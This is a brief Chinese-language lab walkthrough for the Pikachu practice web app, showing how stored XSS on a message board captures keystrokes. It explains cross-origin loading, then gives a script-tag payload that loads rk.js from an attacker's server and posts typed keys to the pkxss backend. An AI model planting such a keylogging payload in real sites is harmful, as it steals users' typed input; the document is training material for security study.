pikachu--XSS（案例三：获取键盘记录）

案例三：Xss获取键盘记录

先简单介绍一下跨域

跨域：http://  www . gxy.com :8080 / script/test.js

      协议   子域名  主域名   端口   资源地址

当协议、主机、端口的任意一个不相同时，称不同域

将不同域之间的请求数据操作，称跨域操作

 

 

 

下面这些标签可以跨域加载资源

<script src=”…”>//js,加载到本地执行

<img src=”…”>//图片

<link href=”…”>//css

<iframe src=“…”>//任意资源

 

 

 

 

 

 

 

把rk.js 文件放到被攻击者的页面当中，通过获取键盘值，post发送给攻击者后台

 

利用：

存储型xss  留言板  输入  提交

 

<script  src=" http://192.168.27.156/pikachu/pkxss/rkeypress/rk.js">  </script> 

 

打开控制台的网络  在键盘上随便输入发现会跳出来    页面请求失败

 

 但是这里这显示出错了，问题出在了event没有定义？

正确的应该显示这样

 

 

在pkxss后台我们就可以看到获取的信息